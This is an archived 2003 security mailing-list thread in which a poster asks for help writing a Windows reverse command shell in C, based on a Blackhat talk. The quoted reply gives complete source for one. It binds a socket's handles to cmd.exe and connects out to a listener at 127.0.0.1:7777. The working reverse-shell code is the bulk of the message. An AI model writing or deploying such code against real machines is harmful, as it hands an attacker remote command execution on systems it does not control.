Re[2]: Windows reverse Shell

From: A*** (netninja@hotmail.kg)
Date: 02/05/03

  • Next message: Knud Erik Højgaard: "Fw: f-prot antivirus useless buffer overflow" 
    Date: Wed, 5 Feb 2003 15:03:03 +0600
From: A*** <netninja@hotmail.kg>
To: 3APA3A <3APA3A@SECURITY.NNOV.RU>

    Hello 3APA3A,

    Thnx for ur code. The one i wrote is absolutely the same without bind.
    Infact we dont need "bind", though David Litchfield mentions it in his
    Blackhat talk. SO anyway did u try compiling ur code? if not u should
    try, coz i c the same results,ie i get connection on my netcat, but then
    it suddenly disconnects. no command prompt.

    Tuesday, February 4, 2003, 10:34:56 PM, you wrote:

    3> Return-Path: <3APA3A@SECURITY.NNOV.RU>
    3> X-Sieve: cmu-sieve 2.0
    3> Received: from woland.freenet.kg (woland.freenet.kg [212.112.99.34])
    3> by mail.hotmail.kg (Hotmail.KG edition/Version 1.0) with ESMTP id h14GVEb17456
    3> for <netninja@hotmail.kg>; Tue, 4 Feb 2003 21:31:14 +0500 (KGT)
    3> Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2])
    3> by woland.freenet.kg (8.12.6/8.12.6) with ESMTP id h14HtUoc013643
    3> for <netninja@hotmail.kg>; Tue, 4 Feb 2003 22:55:39 +0500
    3> Received: from anonymous.sandy.ru (anonymous.sandy.ru. [195.122.226.40])
    3> by adm.sci-nnov.ru (8.11.6/8.11.6) with ESMTP id h14GYuu38518;
    3> Tue, 4 Feb 2003 19:34:56 +0300 (MSK)
    3> (envelope-from 3APA3A@SECURITY.NNOV.RU)
    3> Date: Tue, 4 Feb 2003 19:34:56 +0300
    3> From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
    3> X-Mailer: The Bat! (v1.61)
    3> Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
    3> Organization: http://www.security.nnov.ru
    3> X-Priority: 3 (Normal)
    3> Message-ID: <1939904491.20030204193456@SECURITY.NNOV.RU>
    3> To: SecFocus <netninja@hotmail.kg>
    3> CC: vuln-dev@securityfocus.com
    3> Subject: Re: Windows reverse Shell
    3> In-Reply-To: <1028124981.20030204013745@hotmail.kg>
    3> References: <1028124981.20030204013745@hotmail.kg>
    3> MIME-Version: 1.0
    3> Content-Type: text/plain; charset=Windows-1251
    3> Content-Transfer-Encoding: 8bit

    3> Dear NetNinja,

    3> Code below successfully brings reverse shell to 127.0.0.1:7777.

    3> #include <windows.h>
    3> #include <winsock2.h>
    3> #include <stdio.h>

    3> int main(int argc, char* argv[]){
    3> WSADATA wd;
    3> HANDLE h;
    3> SOCKET sock;
    3> STARTUPINFO si;
    3> PROCESS_INFORMATION pi;
    3> struct sockaddr_in sin;
    3> int size = sizeof(sin);

    3> memset(&sin, 0, sizeof(sin));
    3> memset(&si, 0, sizeof(si));
    3> WSAStartup(MAKEWORD( 1, 1 ), &wd);
    3> sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    3> sin.sin_family = AF_INET;
    3> bind(sock, (struct sockaddr*)&sin, size);
    3> sin.sin_port = htons(7777);
    3> sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    3> connect(sock, (struct sockaddr*)&sin, size);
    3> si.cb = sizeof(si);
    3> si.dwFlags = STARTF_USESTDHANDLES;
    3> si.hStdInput = si.hStdOutput = si.hStdError = sock;
    3> CreateProcess(
    3> NULL,
    3> "cmd.exe",
    3> NULL,
    3> NULL,
    3> TRUE,
    3> 0,
    3> 0,
    3> NULL,
    3> &si,
    3> &pi
    3> );
    3> return 0;
    3> }

    3> --Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-dev@securityfocus.com:

    N>> Hello guys,

    N>> David Litchfield in his Blackhat talk, talked about using socket handle
    N>> from WSASocket() and pass that handle as a parameter to stdin, stdout
    N>> and stderr for CreateProcess function. By doin this way his reverse
    N>> cmd shellcode becomes much smaller. I tried coding that reverse
    N>> command shell in C, but couldnt get it to work. It simply connects to
    N>> my listening netcat listener and then disconnects. David Litchfield
    N>> used 4 functions to achieva that WSASocket, bind, connect and
    N>> CreateProcess. A lil help would b appreciated on building this reverse
    N>> cmd shell. thanx.
       

    -- 
Best regards,
 A***                            mailto:netninja@hotmail.kg
    • Quantcast